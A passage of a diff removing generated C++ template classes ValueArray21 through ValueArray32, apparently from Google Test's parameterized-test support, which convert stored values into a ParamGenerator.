-      v12_(v12), v13_(v13), v14_(v14), v15_(v15), v16_(v16), v17_(v17),
-      v18_(v18), v19_(v19), v20_(v20), v21_(v21) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray21& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22>
-class ValueArray22 {
- public:
-  ValueArray22(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22) : v1_(v1), v2_(v2), v3_(v3),
-      v4_(v4), v5_(v5), v6_(v6), v7_(v7), v8_(v8), v9_(v9), v10_(v10),
-      v11_(v11), v12_(v12), v13_(v13), v14_(v14), v15_(v15), v16_(v16),
-      v17_(v17), v18_(v18), v19_(v19), v20_(v20), v21_(v21), v22_(v22) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray22& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23>
-class ValueArray23 {
- public:
-  ValueArray23(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23) : v1_(v1), v2_(v2),
-      v3_(v3), v4_(v4), v5_(v5), v6_(v6), v7_(v7), v8_(v8), v9_(v9), v10_(v10),
-      v11_(v11), v12_(v12), v13_(v13), v14_(v14), v15_(v15), v16_(v16),
-      v17_(v17), v18_(v18), v19_(v19), v20_(v20), v21_(v21), v22_(v22),
-      v23_(v23) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_), static_cast<T>(v23_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray23& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-  const T23 v23_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24>
-class ValueArray24 {
- public:
-  ValueArray24(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24) : v1_(v1),
-      v2_(v2), v3_(v3), v4_(v4), v5_(v5), v6_(v6), v7_(v7), v8_(v8), v9_(v9),
-      v10_(v10), v11_(v11), v12_(v12), v13_(v13), v14_(v14), v15_(v15),
-      v16_(v16), v17_(v17), v18_(v18), v19_(v19), v20_(v20), v21_(v21),
-      v22_(v22), v23_(v23), v24_(v24) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_), static_cast<T>(v23_),
-        static_cast<T>(v24_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray24& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-  const T23 v23_;
-  const T24 v24_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25>
-class ValueArray25 {
- public:
-  ValueArray25(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24,
-      T25 v25) : v1_(v1), v2_(v2), v3_(v3), v4_(v4), v5_(v5), v6_(v6), v7_(v7),
-      v8_(v8), v9_(v9), v10_(v10), v11_(v11), v12_(v12), v13_(v13), v14_(v14),
-      v15_(v15), v16_(v16), v17_(v17), v18_(v18), v19_(v19), v20_(v20),
-      v21_(v21), v22_(v22), v23_(v23), v24_(v24), v25_(v25) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_), static_cast<T>(v23_),
-        static_cast<T>(v24_), static_cast<T>(v25_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray25& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-  const T23 v23_;
-  const T24 v24_;
-  const T25 v25_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26>
-class ValueArray26 {
- public:
-  ValueArray26(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-      T26 v26) : v1_(v1), v2_(v2), v3_(v3), v4_(v4), v5_(v5), v6_(v6), v7_(v7),
-      v8_(v8), v9_(v9), v10_(v10), v11_(v11), v12_(v12), v13_(v13), v14_(v14),
-      v15_(v15), v16_(v16), v17_(v17), v18_(v18), v19_(v19), v20_(v20),
-      v21_(v21), v22_(v22), v23_(v23), v24_(v24), v25_(v25), v26_(v26) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_), static_cast<T>(v23_),
-        static_cast<T>(v24_), static_cast<T>(v25_), static_cast<T>(v26_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray26& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-  const T23 v23_;
-  const T24 v24_;
-  const T25 v25_;
-  const T26 v26_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27>
-class ValueArray27 {
- public:
-  ValueArray27(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-      T26 v26, T27 v27) : v1_(v1), v2_(v2), v3_(v3), v4_(v4), v5_(v5), v6_(v6),
-      v7_(v7), v8_(v8), v9_(v9), v10_(v10), v11_(v11), v12_(v12), v13_(v13),
-      v14_(v14), v15_(v15), v16_(v16), v17_(v17), v18_(v18), v19_(v19),
-      v20_(v20), v21_(v21), v22_(v22), v23_(v23), v24_(v24), v25_(v25),
-      v26_(v26), v27_(v27) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_), static_cast<T>(v23_),
-        static_cast<T>(v24_), static_cast<T>(v25_), static_cast<T>(v26_),
-        static_cast<T>(v27_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray27& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-  const T23 v23_;
-  const T24 v24_;
-  const T25 v25_;
-  const T26 v26_;
-  const T27 v27_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28>
-class ValueArray28 {
- public:
-  ValueArray28(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-      T26 v26, T27 v27, T28 v28) : v1_(v1), v2_(v2), v3_(v3), v4_(v4), v5_(v5),
-      v6_(v6), v7_(v7), v8_(v8), v9_(v9), v10_(v10), v11_(v11), v12_(v12),
-      v13_(v13), v14_(v14), v15_(v15), v16_(v16), v17_(v17), v18_(v18),
-      v19_(v19), v20_(v20), v21_(v21), v22_(v22), v23_(v23), v24_(v24),
-      v25_(v25), v26_(v26), v27_(v27), v28_(v28) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_), static_cast<T>(v23_),
-        static_cast<T>(v24_), static_cast<T>(v25_), static_cast<T>(v26_),
-        static_cast<T>(v27_), static_cast<T>(v28_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray28& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-  const T23 v23_;
-  const T24 v24_;
-  const T25 v25_;
-  const T26 v26_;
-  const T27 v27_;
-  const T28 v28_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29>
-class ValueArray29 {
- public:
-  ValueArray29(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-      T26 v26, T27 v27, T28 v28, T29 v29) : v1_(v1), v2_(v2), v3_(v3), v4_(v4),
-      v5_(v5), v6_(v6), v7_(v7), v8_(v8), v9_(v9), v10_(v10), v11_(v11),
-      v12_(v12), v13_(v13), v14_(v14), v15_(v15), v16_(v16), v17_(v17),
-      v18_(v18), v19_(v19), v20_(v20), v21_(v21), v22_(v22), v23_(v23),
-      v24_(v24), v25_(v25), v26_(v26), v27_(v27), v28_(v28), v29_(v29) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_), static_cast<T>(v23_),
-        static_cast<T>(v24_), static_cast<T>(v25_), static_cast<T>(v26_),
-        static_cast<T>(v27_), static_cast<T>(v28_), static_cast<T>(v29_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray29& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-  const T23 v23_;
-  const T24 v24_;
-  const T25 v25_;
-  const T26 v26_;
-  const T27 v27_;
-  const T28 v28_;
-  const T29 v29_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30>
-class ValueArray30 {
- public:
-  ValueArray30(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-      T26 v26, T27 v27, T28 v28, T29 v29, T30 v30) : v1_(v1), v2_(v2), v3_(v3),
-      v4_(v4), v5_(v5), v6_(v6), v7_(v7), v8_(v8), v9_(v9), v10_(v10),
-      v11_(v11), v12_(v12), v13_(v13), v14_(v14), v15_(v15), v16_(v16),
-      v17_(v17), v18_(v18), v19_(v19), v20_(v20), v21_(v21), v22_(v22),
-      v23_(v23), v24_(v24), v25_(v25), v26_(v26), v27_(v27), v28_(v28),
-      v29_(v29), v30_(v30) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_), static_cast<T>(v23_),
-        static_cast<T>(v24_), static_cast<T>(v25_), static_cast<T>(v26_),
-        static_cast<T>(v27_), static_cast<T>(v28_), static_cast<T>(v29_),
-        static_cast<T>(v30_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray30& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-  const T23 v23_;
-  const T24 v24_;
-  const T25 v25_;
-  const T26 v26_;
-  const T27 v27_;
-  const T28 v28_;
-  const T29 v29_;
-  const T30 v30_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31>
-class ValueArray31 {
- public:
-  ValueArray31(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-      T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31) : v1_(v1), v2_(v2),
-      v3_(v3), v4_(v4), v5_(v5), v6_(v6), v7_(v7), v8_(v8), v9_(v9), v10_(v10),
-      v11_(v11), v12_(v12), v13_(v13), v14_(v14), v15_(v15), v16_(v16),
-      v17_(v17), v18_(v18), v19_(v19), v20_(v20), v21_(v21), v22_(v22),
-      v23_(v23), v24_(v24), v25_(v25), v26_(v26), v27_(v27), v28_(v28),
-      v29_(v29), v30_(v30), v31_(v31) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_), static_cast<T>(v23_),
-        static_cast<T>(v24_), static_cast<T>(v25_), static_cast<T>(v26_),
-        static_cast<T>(v27_), static_cast<T>(v28_), static_cast<T>(v29_),
-        static_cast<T>(v30_), static_cast<T>(v31_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray31& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-  const T23 v23_;
-  const T24 v24_;
-  const T25 v25_;
-  const T26 v26_;
-  const T27 v27_;
-  const T28 v28_;
-  const T29 v29_;
-  const T30 v30_;
-  const T31 v31_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32>
-class ValueArray32 {
- public:
-  ValueArray32(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-      T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31, T32 v32) : v1_(v1),
-      v2_(v2), v3_(v3), v4_(v4), v5_(v5), v6_(v6), v7_(v7), v8_(v8), v9_(v9),
-      v10_(v10), v11_(v11), v12_(v12), v13_(v13), v14_(v14), v15_(v15),
-      v16_(v16), v17_(v17), v18_(v18), v19_(v19), v20_(v20), v21_(v21),
-      v22_(v22), v23_(v23), v24_(v24), v25_(v25), v26_(v26), v27_(v27),
-      v28_(v28), v29_(v29), v30_(v30), v31_(v31), v32_(v32) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_), static_cast<T>(v23_),
-        static_cast<T>(v24_), static_cast<T>(v25_), static_cast<T>(v26_),
-        static_cast<T>(v27_), static_cast<T>(v28_), static_cast<T>(v29_),
-        static_cast<T>(v30_), static_cast<T>(v31_), static_cast<T>(v32_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray32& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-  const T23 v23_;
-  const T24 v24_;
-  const T25 v25_;
-  const T26 v26_;
-  const T27 v27_;
-  const T28 v28_;
